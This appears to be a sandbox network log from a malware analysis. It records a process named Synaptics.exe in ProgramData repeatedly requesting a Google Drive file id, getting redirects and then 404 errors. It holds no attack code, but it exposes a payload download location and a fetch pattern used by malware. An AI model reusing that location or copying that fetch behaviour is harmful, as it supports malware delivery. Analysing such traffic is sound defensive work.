                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                 2024-12-24 17:20:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-vtiDm0CYSgIdI5kPPAT6Qw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                29 | 192.168.2.4 | 49831 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:42 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:42 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-QFrCzzEMUmFwkjf_GPNpEQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                30 | 192.168.2.4 | 49828 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:42 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:42 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC5htGShh6kvz7wMa-32dSzHj10a-8EKXHMpU52ygmdbWUJFHbqdiVVEn_tdd39drgIr
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-IYmIZvZ76YfZzW5S9Z7iUg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:42 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                2024-12-24 17:20:42 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="PVeTCkxdgMFGec9PhH7CSA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                2024-12-24 17:20:42 UTC | 115 | IN | Data Ascii: >That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                31 | 192.168.2.4 | 49830 | 142.250.181.97 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:42 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Cache-Control: no-cache
                                                                                                                                Host: drive.usercontent.google.com
                                                                                                                                Connection: Keep-Alive
                                                                                                                                Cookie: NID=520=p0E_LkS9oKugNUCdoqy_sMWPCqPd6Q85qp7og9By5GDrMGQOuF9xzFvLZ9eovIm-elwYsEwuSBKPIc3z1EmZmRuGVjdL0brECf8mXVgSmW5qfG7guvs2lhntCUOWqvShQF5bqn5R_b8f8UkTxYznayQsVmWaIv6qM0Vg0zptknET_-EbAP9NXbU
                                                                                                                                2024-12-24 17:20:43 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                                X-GUploader-UploadID: AFiumC5wUy6ykN5pwT7khyQDaCCQHViKV3e01_aXLPjVhDnUC7C9VCPARsWMtSr0HyDFc2Bk5mghhJI
                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:42 GMT
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-cOrI6xM3zGjHgLysfm5l4A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Length: 1652
                                                                                                                                Server: UploadServer
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                                Connection: close
                                                                                                                                2024-12-24 17:20:43 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                                2024-12-24 17:20:43 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="N5JHt0j5yW0B9oATw6n7FQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                                2024-12-24 17:20:43 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                32 | 192.168.2.4 | 49839 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:45 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:45 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-RkLU1GlTsYaRA2TUZZe0Dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


                                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                33 | 192.168.2.4 | 49840 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                                2024-12-24 17:20:45 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-24 17:20:46 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:45 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-EXUXbdtuHdIw-s233N-7ZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.4 | 49849 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:49 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:49 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-e2JBVZYkRLbfCGRAFBYOaA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
35 | 192.168.2.4 | 49848 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:49 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:50 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:49 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-SBbFc1bmj4qkG3brCtGhaQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49857 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:53 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:53 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-rES5CrLmXgxn1WaO-AuxQg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49858 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:53 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:54 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:53 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-jr9f-y2eDV1wVUbze7eS-A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49867 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:57 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:57 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-AZBNuhrRkLyau95PF6SN5Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Server: ESF
                                                                                                                                Content-Length: 0
                                                                                                                                X-XSS-Protection: 0
                                                                                                                                X-Frame-Options: SAMEORIGIN
                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49868 | 142.250.181.14 | 443 | 4076 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-24 17:20:57 UTC | 143 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                User-Agent: Synaptics.exe
                                                                                                                                Host: docs.google.com
                                                                                                                                Cache-Control: no-cache
2024-12-24 17:20:58 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                Content-Type: application/binary
                                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                Pragma: no-cache
                                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                Date: Tue, 24 Dec 2024 17:20:57 GMT
                                                                                                                                Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-MEmNMVEUY5iPlAOwG-Nf8A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                                Server: ESF
